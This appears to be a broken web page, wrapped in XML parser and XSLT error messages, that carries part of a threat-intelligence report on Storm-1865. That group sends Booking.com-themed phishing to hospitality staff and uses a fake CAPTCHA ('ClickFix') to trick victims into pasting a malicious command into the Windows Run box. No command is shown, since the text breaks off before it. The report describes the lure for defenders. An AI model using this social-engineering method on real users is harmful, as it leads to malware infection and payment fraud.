[__parse_string] Error parsing XML in string:
:276: parser error : Opening and ending tag mismatch: p line 270 and text
</text>
^
:276: parser error : Premature end of data in tag text line 263
</text>
^
<text><h3>
<insert-summary-here /></h3>
<p>This phishing attack specifically targets individuals in hospitality organizations in North America, Oceania, South and Southeast Asia, and Northern, Southern, Eastern, and Western Europe, that are most likely to work with Booking.com, sending fake emails purporting to be coming from the agency.</p>
<p>In the ClickFix technique, a threat actor attempts to take advantage of human problem-solving tendencies by displaying fake error messages or prompts that instruct target users to fix issues by copying, pasting, and launching commands that eventually result in the download of malware. This need for user interaction could allow an attack to slip through conventional and automated security features. In the case of this phishing campaign, the user is prompted to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the phishing page adds to the clipboard.</p>
<p>Microsoft tracks this campaign as Storm-1865, a cluster of activity related to phishing campaigns leading to payment data theft and fraudulent charges. Organizations can reduce the impact of phishing attacks by educating users on recognizing such scams. This blog includes additional recommendations to help users and defenders defend against these threats.</p>
<h3>Phishing campaign using the ClickFix social engineering technique</h3>
<p>In this campaign, Storm-1865 identifies target organizations in the hospitality sector and targets individuals at those organizations likely to work with Booking.com. Storm-1865 then sends a malicious email impersonating Booking.com to the targeted individual. The content of the email varies greatly, referencing negative guest reviews, requests from prospective guests, online promotion opportunities, account verification, and more.</p>
<p>
<photo id=”73095424″ />
<photo id=”73095426″ />
<p>The email includes a link, or a PDF attachment containing one, claiming to take recipients to Booking.com. Clicking the link leads to a webpage that displays a fake CAPTCHA overlayed on a subtly visible background designed to mimic a legitimate Booking.com page. This webpage gives the illusion that Booking.com uses additional verification checks, which might give the targeted user a false sense of security and therefore increase their chances of getting compromised.</p>
<p>The fake CAPTCHA is where the webpage employs the ClickFix social engineering technique to download the malicious payload. This technique instructs the user to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the webpage adds to the clipboard:</p>
</text>
Error in transformation of “news/id.xslt:
runtime error: file /data/Hsyndicate/Project/hn/xslt/news/id.xslt line 1484 element variable
Failed to evaluate the expression of variable ‘cleaned’.
at /usr/local/share/perl/5.22.1/XML/XFM/Request.pm line 519.
”
